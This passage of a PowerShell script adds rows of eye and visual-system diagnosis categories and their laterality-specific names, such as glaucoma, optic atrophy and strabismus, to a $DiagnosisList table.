of eye","Primary hypotony of eye, bilateral") + $null = $DiagnosisList.Rows.Add("Primary hypotony of eye","Primary hypotony of unspecified eye") + $null = $DiagnosisList.Rows.Add("Degenerated conditions of globe","Unspecified degenerated conditions of globe") + $null = $DiagnosisList.Rows.Add("Absolute glaucoma","Absolute glaucoma, right eye") + $null = $DiagnosisList.Rows.Add("Absolute glaucoma","Absolute glaucoma, left eye") + $null = $DiagnosisList.Rows.Add("Absolute glaucoma","Absolute glaucoma, bilateral") + $null = $DiagnosisList.Rows.Add("Absolute glaucoma","Absolute glaucoma, unspecified eye") + $null = $DiagnosisList.Rows.Add("Atrophy of globe","Atrophy of globe, right eye") + $null = $DiagnosisList.Rows.Add("Atrophy of globe","Atrophy of globe, left eye") + $null = $DiagnosisList.Rows.Add("Atrophy of globe","Atrophy of globe, bilateral") + $null = $DiagnosisList.Rows.Add("Atrophy of globe","Atrophy of globe, unspecified eye") + $null = $DiagnosisList.Rows.Add("Leucocoria","Leucocoria, right eye") + $null = $DiagnosisList.Rows.Add("Leucocoria","Leucocoria, left eye") + $null = $DiagnosisList.Rows.Add("Leucocoria","Leucocoria, bilateral") + $null = $DiagnosisList.Rows.Add("Leucocoria","Leucocoria, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified retained (old) intraocular foreign body, magnetic","Unspecified retained (old) intraocular foreign body, magnetic, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified retained (old) intraocular foreign body, magnetic","Unspecified retained (old) intraocular foreign body, magnetic, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified retained (old) intraocular foreign body, magnetic","Unspecified retained (old) intraocular foreign body, magnetic, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified retained (old) intraocular foreign body, magnetic","Unspecified retained (old) intraocular foreign body, magnetic, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in anterior chamber","Retained (old) magnetic foreign body in anterior chamber, right eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in anterior chamber","Retained (old) magnetic foreign body in anterior chamber, left eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in anterior chamber","Retained (old) magnetic foreign body in anterior chamber, bilateral") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in anterior chamber","Retained (old) magnetic foreign body in anterior chamber, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in iris or ciliary body","Retained (old) magnetic foreign body in iris or ciliary body, right eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in iris or ciliary body","Retained (old) magnetic foreign body in iris or ciliary body, left eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in iris or ciliary body","Retained (old) magnetic foreign body in iris or ciliary body, bilateral") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in iris or ciliary body","Retained (old) magnetic foreign body in iris or ciliary body, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in lens","Retained (old) magnetic foreign body in lens, right eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in lens","Retained (old) magnetic foreign body in lens, left eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in lens","Retained (old) magnetic foreign body in lens, bilateral") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in lens","Retained (old) magnetic foreign body in lens, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in posterior wall of globe","Retained (old) magnetic foreign body in posterior wall of globe, right eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in posterior wall of globe","Retained (old) magnetic foreign body in posterior wall of globe, left eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in posterior wall of globe","Retained (old) magnetic foreign body in posterior wall of globe, bilateral") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in posterior wall of globe","Retained (old) magnetic foreign body in posterior wall of globe, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in vitreous body","Retained (old) magnetic foreign body in vitreous body, right eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in vitreous body","Retained (old) magnetic foreign body in vitreous body, left eye") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in vitreous body","Retained (old) magnetic foreign body in vitreous body, bilateral") + $null = $DiagnosisList.Rows.Add("Retained (old) magnetic foreign body in vitreous body","Retained (old) magnetic foreign body in vitreous body, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (old) intraocular foreign body, magnetic, in other or multiple sites","Retained (old) intraocular foreign body, magnetic, in other or multiple sites, right eye") + $null = $DiagnosisList.Rows.Add("Retained (old) intraocular foreign body, magnetic, in other or multiple sites","Retained (old) intraocular foreign body, magnetic, in other or multiple sites, left eye") + $null = $DiagnosisList.Rows.Add("Retained (old) intraocular foreign body, magnetic, in other or multiple sites","Retained (old) intraocular foreign body, magnetic, in other or multiple sites, bilateral") + $null = $DiagnosisList.Rows.Add("Retained (old) intraocular foreign body, magnetic, in other or multiple sites","Retained (old) intraocular foreign body, magnetic, in other or multiple sites, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified retained (old) intraocular foreign body, nonmagnetic","Unspecified retained (old) intraocular foreign body, nonmagnetic, right eye") + $null = $DiagnosisList.Rows.Add("Unspecified retained (old) intraocular foreign body, nonmagnetic","Unspecified retained (old) intraocular foreign body, nonmagnetic, left eye") + $null = $DiagnosisList.Rows.Add("Unspecified retained (old) intraocular foreign body, nonmagnetic","Unspecified retained (old) intraocular foreign body, nonmagnetic, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified retained (old) intraocular foreign body, nonmagnetic","Unspecified retained (old) intraocular foreign body, nonmagnetic, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in anterior chamber","Retained (nonmagnetic) (old) foreign body in anterior chamber, right eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in anterior chamber","Retained (nonmagnetic) (old) foreign body in anterior chamber, left eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in anterior chamber","Retained (nonmagnetic) (old) foreign body in anterior chamber, bilateral") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in anterior chamber","Retained (nonmagnetic) (old) foreign body in anterior chamber, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in iris or ciliary body","Retained (nonmagnetic) (old) foreign body in iris or ciliary body, right eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in iris or ciliary body","Retained (nonmagnetic) (old) foreign body in iris or ciliary body, left eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in iris or ciliary body","Retained (nonmagnetic) (old) foreign body in iris or ciliary body, bilateral") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in iris or ciliary body","Retained (nonmagnetic) (old) foreign body in iris or ciliary body, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in lens","Retained (nonmagnetic) (old) foreign body in lens, right eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in lens","Retained (nonmagnetic) (old) foreign body in lens, left eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in lens","Retained (nonmagnetic) (old) foreign body in lens, bilateral") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in lens","Retained (nonmagnetic) (old) foreign body in lens, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in posterior wall of globe","Retained (nonmagnetic) (old) foreign body in posterior wall of globe, right eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in posterior wall of globe","Retained (nonmagnetic) (old) foreign body in posterior wall of globe, left eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in posterior wall of globe","Retained (nonmagnetic) (old) foreign body in posterior wall of globe, bilateral") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in posterior wall of globe","Retained (nonmagnetic) (old) foreign body in posterior wall of globe, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in vitreous body","Retained (nonmagnetic) (old) foreign body in vitreous body, right eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in vitreous body","Retained (nonmagnetic) (old) foreign body in vitreous body, left eye") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in vitreous body","Retained (nonmagnetic) (old) foreign body in vitreous body, bilateral") + $null = $DiagnosisList.Rows.Add("Retained (nonmagnetic) (old) foreign body in vitreous body","Retained (nonmagnetic) (old) foreign body in vitreous body, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retained (old) intraocular foreign body, nonmagnetic, in other or multiple sites","Retained (old) intraocular foreign body, nonmagnetic, in other or multiple sites, right eye") + $null = $DiagnosisList.Rows.Add("Retained (old) intraocular foreign body, nonmagnetic, in other or multiple sites","Retained (old) intraocular foreign body, nonmagnetic, in other or multiple sites, left eye") + $null = $DiagnosisList.Rows.Add("Retained (old) intraocular foreign body, nonmagnetic, in other or multiple sites","Retained (old) intraocular foreign body, nonmagnetic, in other or multiple sites, bilateral") + $null = $DiagnosisList.Rows.Add("Retained (old) intraocular foreign body, nonmagnetic, in other or multiple sites","Retained (old) intraocular foreign body, nonmagnetic, in other or multiple sites, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hemophthalmos","Hemophthalmos, right eye") + $null = $DiagnosisList.Rows.Add("Hemophthalmos","Hemophthalmos, left eye") + $null = $DiagnosisList.Rows.Add("Hemophthalmos","Hemophthalmos, bilateral") + $null = $DiagnosisList.Rows.Add("Hemophthalmos","Hemophthalmos, unspecified eye") + $null = $DiagnosisList.Rows.Add("Luxation of globe","Luxation of globe, right eye") + $null = $DiagnosisList.Rows.Add("Luxation of globe","Luxation of globe, left eye") + $null = $DiagnosisList.Rows.Add("Luxation of globe","Luxation of globe, bilateral") + $null = $DiagnosisList.Rows.Add("Luxation of globe","Luxation of globe, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other disorders of globe","Other disorders of globe") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of globe","Unspecified disorder of globe") + $null = $DiagnosisList.Rows.Add("Optic papillitis","Optic papillitis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Optic papillitis","Optic papillitis, right eye") + $null = $DiagnosisList.Rows.Add("Optic papillitis","Optic papillitis, left eye") + $null = $DiagnosisList.Rows.Add("Optic papillitis","Optic papillitis, bilateral") + $null = $DiagnosisList.Rows.Add("Retrobulbar neuritis","Retrobulbar neuritis, unspecified eye") + $null = $DiagnosisList.Rows.Add("Retrobulbar neuritis","Retrobulbar neuritis, right eye") + $null = $DiagnosisList.Rows.Add("Retrobulbar neuritis","Retrobulbar neuritis, left eye") + $null = $DiagnosisList.Rows.Add("Retrobulbar neuritis","Retrobulbar neuritis, bilateral") + $null = $DiagnosisList.Rows.Add("Nutritional optic neuropathy","Nutritional optic neuropathy") + $null = $DiagnosisList.Rows.Add("Toxic optic neuropathy","Toxic optic neuropathy") + $null = $DiagnosisList.Rows.Add("Other optic neuritis","Other optic neuritis") + $null = $DiagnosisList.Rows.Add("Unspecified optic neuritis","Unspecified optic neuritis") + $null = $DiagnosisList.Rows.Add("Ischemic optic neuropathy","Ischemic optic neuropathy, right eye") + $null = $DiagnosisList.Rows.Add("Ischemic optic neuropathy","Ischemic optic neuropathy, left eye") + $null = $DiagnosisList.Rows.Add("Ischemic optic neuropathy","Ischemic optic neuropathy, bilateral") + $null = $DiagnosisList.Rows.Add("Ischemic optic neuropathy","Ischemic optic neuropathy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hemorrhage in optic nerve sheath","Hemorrhage in optic nerve sheath, right eye") + $null = $DiagnosisList.Rows.Add("Hemorrhage in optic nerve sheath","Hemorrhage in optic nerve sheath, left eye") + $null = $DiagnosisList.Rows.Add("Hemorrhage in optic nerve sheath","Hemorrhage in optic nerve sheath, bilateral") + $null = $DiagnosisList.Rows.Add("Hemorrhage in optic nerve sheath","Hemorrhage in optic nerve sheath, unspecified eye") + $null = $DiagnosisList.Rows.Add("Optic nerve hypoplasia","Optic nerve hypoplasia, right eye") + $null = $DiagnosisList.Rows.Add("Optic nerve hypoplasia","Optic nerve hypoplasia, left eye") + $null = $DiagnosisList.Rows.Add("Optic nerve hypoplasia","Optic nerve hypoplasia, bilateral") + $null = $DiagnosisList.Rows.Add("Optic nerve hypoplasia","Optic nerve hypoplasia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other disorders of optic nerve, not elsewhere classified","Other disorders of optic nerve, not elsewhere classified, right eye") + $null = $DiagnosisList.Rows.Add("Other disorders of optic nerve, not elsewhere classified","Other disorders of optic nerve, not elsewhere classified, left eye") + $null = $DiagnosisList.Rows.Add("Other disorders of optic nerve, not elsewhere classified","Other disorders of optic nerve, not elsewhere classified, bilateral") + $null = $DiagnosisList.Rows.Add("Other disorders of optic nerve, not elsewhere classified","Other disorders of optic nerve, not elsewhere classified, unspecified eye") + $null = $DiagnosisList.Rows.Add("Papilledema","Unspecified papilledema") + $null = $DiagnosisList.Rows.Add("Papilledema","Papilledema associated with increased intracranial pressure") + $null = $DiagnosisList.Rows.Add("Papilledema","Papilledema associated with decreased ocular pressure") + $null = $DiagnosisList.Rows.Add("Papilledema","Papilledema associated with retinal disorder") + $null = $DiagnosisList.Rows.Add("Foster-Kennedy syndrome","Foster-Kennedy syndrome, right eye") + $null = $DiagnosisList.Rows.Add("Foster-Kennedy syndrome","Foster-Kennedy syndrome, left eye") + $null = $DiagnosisList.Rows.Add("Foster-Kennedy syndrome","Foster-Kennedy syndrome, bilateral") + $null = $DiagnosisList.Rows.Add("Foster-Kennedy syndrome","Foster-Kennedy syndrome, unspecified eye") + $null = $DiagnosisList.Rows.Add("Optic atrophy","Unspecified optic atrophy") + $null = $DiagnosisList.Rows.Add("Primary optic atrophy","Primary optic atrophy, right eye") + $null = $DiagnosisList.Rows.Add("Primary optic atrophy","Primary optic atrophy, left eye") + $null = $DiagnosisList.Rows.Add("Primary optic atrophy","Primary optic atrophy, bilateral") + $null = $DiagnosisList.Rows.Add("Primary optic atrophy","Primary optic atrophy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hereditary optic atrophy","Hereditary optic atrophy") + $null = $DiagnosisList.Rows.Add("Glaucomatous optic atrophy","Glaucomatous optic atrophy, right eye") + $null = $DiagnosisList.Rows.Add("Glaucomatous optic atrophy","Glaucomatous optic atrophy, left eye") + $null = $DiagnosisList.Rows.Add("Glaucomatous optic atrophy","Glaucomatous optic atrophy, bilateral") + $null = $DiagnosisList.Rows.Add("Glaucomatous optic atrophy","Glaucomatous optic atrophy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other optic atrophy","Other optic atrophy, right eye") + $null = $DiagnosisList.Rows.Add("Other optic atrophy","Other optic atrophy, left eye") + $null = $DiagnosisList.Rows.Add("Other optic atrophy","Other optic atrophy, bilateral") + $null = $DiagnosisList.Rows.Add("Other optic atrophy","Other optic atrophy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Coloboma of optic disc","Coloboma of optic disc, right eye") + $null = $DiagnosisList.Rows.Add("Coloboma of optic disc","Coloboma of optic disc, left eye") + $null = $DiagnosisList.Rows.Add("Coloboma of optic disc","Coloboma of optic disc, bilateral") + $null = $DiagnosisList.Rows.Add("Coloboma of optic disc","Coloboma of optic disc, unspecified eye") + $null = $DiagnosisList.Rows.Add("Drusen of optic disc","Drusen of optic disc, right eye") + $null = $DiagnosisList.Rows.Add("Drusen of optic disc","Drusen of optic disc, left eye") + $null = $DiagnosisList.Rows.Add("Drusen of optic disc","Drusen of optic disc, bilateral") + $null = $DiagnosisList.Rows.Add("Drusen of optic disc","Drusen of optic disc, unspecified eye") + $null = $DiagnosisList.Rows.Add("Pseudopapilledema of optic disc","Pseudopapilledema of optic disc, right eye") + $null = $DiagnosisList.Rows.Add("Pseudopapilledema of optic disc","Pseudopapilledema of optic disc, left eye") + $null = $DiagnosisList.Rows.Add("Pseudopapilledema of optic disc","Pseudopapilledema of optic disc, bilateral") + $null = $DiagnosisList.Rows.Add("Pseudopapilledema of optic disc","Pseudopapilledema of optic disc, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other disorders of optic disc","Other disorders of optic disc, right eye") + $null = $DiagnosisList.Rows.Add("Other disorders of optic disc","Other disorders of optic disc, left eye") + $null = $DiagnosisList.Rows.Add("Other disorders of optic disc","Other disorders of optic disc, bilateral") + $null = $DiagnosisList.Rows.Add("Other disorders of optic disc","Other disorders of optic disc, unspecified eye") + $null = $DiagnosisList.Rows.Add("Disorders of optic chiasm","Disorders of optic chiasm in (due to) inflammatory disorders") + $null = $DiagnosisList.Rows.Add("Disorders of optic chiasm","Disorders of optic chiasm in (due to) neoplasm") + $null = $DiagnosisList.Rows.Add("Disorders of optic chiasm","Disorders of optic chiasm in (due to) vascular disorders") + $null = $DiagnosisList.Rows.Add("Disorders of optic chiasm","Disorders of optic chiasm in (due to) other disorders") + $null = $DiagnosisList.Rows.Add("Disorders of visual pathways in (due to) inflammatory disorders","Disorders of visual pathways in (due to) inflammatory disorders, right side") + $null = $DiagnosisList.Rows.Add("Disorders of visual pathways in (due to) inflammatory disorders","Disorders of visual pathways in (due to) inflammatory disorders, left side") + $null = $DiagnosisList.Rows.Add("Disorders of visual pathways in (due to) inflammatory disorders","Disorders of visual pathways in (due to) inflammatory disorders, unspecified side") + $null = $DiagnosisList.Rows.Add("Disorders of visual pathways in (due to) neoplasm","Disorders of visual pathways in (due to) neoplasm, right side") + $null = $DiagnosisList.Rows.Add("Disorders of visual pathways in (due to) neoplasm","Disorders of visual pathways in (due to) neoplasm, left side") + $null = $DiagnosisList.Rows.Add("Disorders of visual pathways in (due to) neoplasm","Disorders of visual pathways in (due to) neoplasm, unspecified side") + $null = $DiagnosisList.Rows.Add("Disorders of visual pathways in (due to) vascular disorders","Disorders of visual pathways in (due to) vascular disorders, right side") + $null = $DiagnosisList.Rows.Add("Disorders of visual pathways in (due to) vascular disorders","Disorders of visual pathways in (due to) vascular disorders, left side") + $null = $DiagnosisList.Rows.Add("Disorders of visual pathways in (due to) vascular disorders","Disorders of visual pathways in (due to) vascular disorders, unspecified side") + $null = $DiagnosisList.Rows.Add("Cortical blindness","Cortical blindness, right side of brain") + $null = $DiagnosisList.Rows.Add("Cortical blindness","Cortical blindness, left side of brain") + $null = $DiagnosisList.Rows.Add("Cortical blindness","Cortical blindness, unspecified side of brain") + $null = $DiagnosisList.Rows.Add("Disorders of visual cortex in (due to) inflammatory disorders","Disorders of visual cortex in (due to) inflammatory disorders, right side of brain") + $null = $DiagnosisList.Rows.Add("Disorders of visual cortex in (due to) inflammatory disorders","Disorders of visual cortex in (due to) inflammatory disorders, left side of brain") + $null = $DiagnosisList.Rows.Add("Disorders of visual cortex in (due to) inflammatory disorders","Disorders of visual cortex in (due to) inflammatory disorders, unspecified side of brain") + $null = $DiagnosisList.Rows.Add("Disorders of visual cortex in (due to) neoplasm","Disorders of visual cortex in (due to) neoplasm, right side of brain") + $null = $DiagnosisList.Rows.Add("Disorders of visual cortex in (due to) neoplasm","Disorders of visual cortex in (due to) neoplasm, left side of brain") + $null = $DiagnosisList.Rows.Add("Disorders of visual cortex in (due to) neoplasm","Disorders of visual cortex in (due to) neoplasm, unspecified side of brain") + $null = $DiagnosisList.Rows.Add("Disorders of visual cortex in (due to) vascular disorders","Disorders of visual cortex in (due to) vascular disorders, right side of brain") + $null = $DiagnosisList.Rows.Add("Disorders of visual cortex in (due to) vascular disorders","Disorders of visual cortex in (due to) vascular disorders, left side of brain") + $null = $DiagnosisList.Rows.Add("Disorders of visual cortex in (due to) vascular disorders","Disorders of visual cortex in (due to) vascular disorders, unspecified side of brain") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of visual pathways","Unspecified disorder of visual pathways") + $null = $DiagnosisList.Rows.Add("Third [oculomotor] nerve palsy","Third [oculomotor] nerve palsy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Third [oculomotor] nerve palsy","Third [oculomotor] nerve palsy, right eye") + $null = $DiagnosisList.Rows.Add("Third [oculomotor] nerve palsy","Third [oculomotor] nerve palsy, left eye") + $null = $DiagnosisList.Rows.Add("Third [oculomotor] nerve palsy","Third [oculomotor] nerve palsy, bilateral") + $null = $DiagnosisList.Rows.Add("Fourth [trochlear] nerve palsy","Fourth [trochlear] nerve palsy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Fourth [trochlear] nerve palsy","Fourth [trochlear] nerve palsy, right eye") + $null = $DiagnosisList.Rows.Add("Fourth [trochlear] nerve palsy","Fourth [trochlear] nerve palsy, left eye") + $null = $DiagnosisList.Rows.Add("Fourth [trochlear] nerve palsy","Fourth [trochlear] nerve palsy, bilateral") + $null = $DiagnosisList.Rows.Add("Sixth [abducent] nerve palsy","Sixth [abducent] nerve palsy, unspecified eye") + $null = $DiagnosisList.Rows.Add("Sixth [abducent] nerve palsy","Sixth [abducent] nerve palsy, right eye") + $null = $DiagnosisList.Rows.Add("Sixth [abducent] nerve palsy","Sixth [abducent] nerve palsy, left eye") + $null = $DiagnosisList.Rows.Add("Sixth [abducent] nerve palsy","Sixth [abducent] nerve palsy, bilateral") + $null = $DiagnosisList.Rows.Add("Total (external) ophthalmoplegia","Total (external) ophthalmoplegia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Total (external) ophthalmoplegia","Total (external) ophthalmoplegia, right eye") + $null = $DiagnosisList.Rows.Add("Total (external) ophthalmoplegia","Total (external) ophthalmoplegia, left eye") + $null = $DiagnosisList.Rows.Add("Total (external) ophthalmoplegia","Total (external) ophthalmoplegia, bilateral") + $null = $DiagnosisList.Rows.Add("Progressive external ophthalmoplegia","Progressive external ophthalmoplegia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Progressive external ophthalmoplegia","Progressive external ophthalmoplegia, right eye") + $null = $DiagnosisList.Rows.Add("Progressive external ophthalmoplegia","Progressive external ophthalmoplegia, left eye") + $null = $DiagnosisList.Rows.Add("Progressive external ophthalmoplegia","Progressive external ophthalmoplegia, bilateral") + $null = $DiagnosisList.Rows.Add("Kearns-Sayre syndrome","Kearns-Sayre syndrome, right eye") + $null = $DiagnosisList.Rows.Add("Kearns-Sayre syndrome","Kearns-Sayre syndrome, left eye") + $null = $DiagnosisList.Rows.Add("Kearns-Sayre syndrome","Kearns-Sayre syndrome, bilateral") + $null = $DiagnosisList.Rows.Add("Kearns-Sayre syndrome","Kearns-Sayre syndrome, unspecified eye") + $null = $DiagnosisList.Rows.Add("Other paralytic strabismus","Other paralytic strabismus, right eye") + $null = $DiagnosisList.Rows.Add("Other paralytic strabismus","Other paralytic strabismus, left eye") + $null = $DiagnosisList.Rows.Add("Other paralytic strabismus","Other paralytic strabismus, bilateral") + $null = $DiagnosisList.Rows.Add("Other paralytic strabismus","Other paralytic strabismus, unspecified eye") + $null = $DiagnosisList.Rows.Add("Unspecified paralytic strabismus","Unspecified paralytic strabismus") + $null = $DiagnosisList.Rows.Add("Esotropia","Unspecified esotropia") + $null = $DiagnosisList.Rows.Add("Monocular esotropia","Monocular esotropia, right eye") + $null = $DiagnosisList.Rows.Add("Monocular esotropia","Monocular esotropia, left eye") + $null = $DiagnosisList.Rows.Add("Monocular esotropia with A pattern","Monocular esotropia with A pattern, right eye") + $null = $DiagnosisList.Rows.Add("Monocular esotropia with A pattern","Monocular esotropia with A pattern, left eye") + $null = $DiagnosisList.Rows.Add("Monocular esotropia with V pattern","Monocular esotropia with V pattern, right eye") + $null = $DiagnosisList.Rows.Add("Monocular esotropia with V pattern","Monocular esotropia with V pattern, left eye") + $null = $DiagnosisList.Rows.Add("Monocular esotropia with other noncomitancies","Monocular esotropia with other noncomitancies, right eye") + $null = $DiagnosisList.Rows.Add("Monocular esotropia with other noncomitancies","Monocular esotropia with other noncomitancies, left eye") + $null = $DiagnosisList.Rows.Add("Alternating esotropia","Alternating esotropia") + $null = $DiagnosisList.Rows.Add("Alternating esotropia with A pattern","Alternating esotropia with A pattern") + $null = $DiagnosisList.Rows.Add("Alternating esotropia with V pattern","Alternating esotropia with V pattern") + $null = $DiagnosisList.Rows.Add("Alternating esotropia with other noncomitancies","Alternating esotropia with other noncomitancies") + $null = $DiagnosisList.Rows.Add("Exotropia","Unspecified exotropia") + $null = $DiagnosisList.Rows.Add("Monocular exotropia","Monocular exotropia, right eye") + $null = $DiagnosisList.Rows.Add("Monocular exotropia","Monocular exotropia, left eye") + $null = $DiagnosisList.Rows.Add("Monocular exotropia with A pattern","Monocular exotropia with A pattern, right eye") + $null = $DiagnosisList.Rows.Add("Monocular exotropia with A pattern","Monocular exotropia with A pattern, left eye") + $null = $DiagnosisList.Rows.Add("Monocular exotropia with V pattern","Monocular exotropia with V pattern, right eye") + $null = $DiagnosisList.Rows.Add("Monocular exotropia with V pattern","Monocular exotropia with V pattern, left eye") + $null = $DiagnosisList.Rows.Add("Monocular exotropia with other noncomitancies","Monocular exotropia with other noncomitancies, right eye") + $null = $DiagnosisList.Rows.Add("Monocular exotropia with other noncomitancies","Monocular exotropia with other noncomitancies, left eye") + $null = $DiagnosisList.Rows.Add("Alternating exotropia","Alternating exotropia") + $null = $DiagnosisList.Rows.Add("Alternating exotropia with A pattern","Alternating exotropia with A pattern") + $null = $DiagnosisList.Rows.Add("Alternating exotropia with V pattern","Alternating exotropia with V pattern") + $null = $DiagnosisList.Rows.Add("Alternating exotropia with other noncomitancies","Alternating exotropia with other noncomitancies") + $null = $DiagnosisList.Rows.Add("Vertical strabismus","Vertical strabismus, right eye") + $null = $DiagnosisList.Rows.Add("Vertical strabismus","Vertical strabismus, left eye") + $null = $DiagnosisList.Rows.Add("Intermittent heterotropia","Unspecified intermittent heterotropia") + $null = $DiagnosisList.Rows.Add("Intermittent monocular esotropia","Intermittent monocular esotropia, right eye") + $null = $DiagnosisList.Rows.Add("Intermittent monocular esotropia","Intermittent monocular esotropia, left eye") + $null = $DiagnosisList.Rows.Add("Intermittent alternating esotropia","Intermittent alternating esotropia") + $null = $DiagnosisList.Rows.Add("Intermittent monocular exotropia","Intermittent monocular exotropia, right eye") + $null = $DiagnosisList.Rows.Add("Intermittent monocular exotropia","Intermittent monocular exotropia, left eye") + $null = $DiagnosisList.Rows.Add("Intermittent alternating exotropia","Intermittent alternating exotropia") + $null = $DiagnosisList.Rows.Add("Other and unspecified heterotropia","Unspecified heterotropia") + $null = $DiagnosisList.Rows.Add("Cyclotropia","Cyclotropia, right eye") + $null = $DiagnosisList.Rows.Add("Cyclotropia","Cyclotropia, left eye") + $null = $DiagnosisList.Rows.Add("Monofixation syndrome","Monofixation syndrome") + $null = $DiagnosisList.Rows.Add("Accommodative component in esotropia","Accommodative component in esotropia") + $null = $DiagnosisList.Rows.Add("Heterophoria","Unspecified heterophoria") + $null = $DiagnosisList.Rows.Add("Heterophoria","Esophoria") + $null = $DiagnosisList.Rows.Add("Heterophoria","Exophoria") + $null = $DiagnosisList.Rows.Add("Heterophoria","Vertical heterophoria") + $null = $DiagnosisList.Rows.Add("Heterophoria","Cyclophoria") + $null = $DiagnosisList.Rows.Add("Heterophoria","Alternating heterophoria") + $null = $DiagnosisList.Rows.Add("Mechanical strabismus","Mechanical strabismus, unspecified") + $null = $DiagnosisList.Rows.Add("Brown's sheath syndrome","Brown's sheath syndrome, right eye") + $null = $DiagnosisList.Rows.Add("Brown's sheath syndrome","Brown's sheath syndrome, left eye") + $null = $DiagnosisList.Rows.Add("Other mechanical strabismus","Other mechanical strabismus") + $null = $DiagnosisList.Rows.Add("Duane's syndrome","Duane's syndrome, right eye") + $null = $DiagnosisList.Rows.Add("Duane's syndrome","Duane's syndrome, left eye") + $null = $DiagnosisList.Rows.Add("Other specified strabismus","Other specified strabismus") + $null = $DiagnosisList.Rows.Add("Unspecified strabismus","Unspecified strabismus") + $null = $DiagnosisList.Rows.Add("Other disorders of binocular movement","Palsy (spasm) of conjugate gaze") + $null = $DiagnosisList.Rows.Add("Convergence insufficiency and excess","Convergence insufficiency") + $null = $DiagnosisList.Rows.Add("Convergence insufficiency and excess","Convergence excess") + $null = $DiagnosisList.Rows.Add("Internuclear ophthalmoplegia","Internuclear ophthalmoplegia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Internuclear ophthalmoplegia","Internuclear ophthalmoplegia, right eye") + $null = $DiagnosisList.Rows.Add("Internuclear ophthalmoplegia","Internuclear ophthalmoplegia, left eye") + $null = $DiagnosisList.Rows.Add("Internuclear ophthalmoplegia","Internuclear ophthalmoplegia, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified disorders of binocular movement","Other specified disorders of binocular movement") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of binocular movement","Unspecified disorder of binocular movement") + $null = $DiagnosisList.Rows.Add("Hypermetropia","Hypermetropia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Hypermetropia","Hypermetropia, right eye") + $null = $DiagnosisList.Rows.Add("Hypermetropia","Hypermetropia, left eye") + $null = $DiagnosisList.Rows.Add("Hypermetropia","Hypermetropia, bilateral") + $null = $DiagnosisList.Rows.Add("Myopia","Myopia, unspecified eye") + $null = $DiagnosisList.Rows.Add("Myopia","Myopia, right eye") + $null = $DiagnosisList.Rows.Add("Myopia","Myopia, left eye") + $null = $DiagnosisList.Rows.Add("Myopia","Myopia, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified 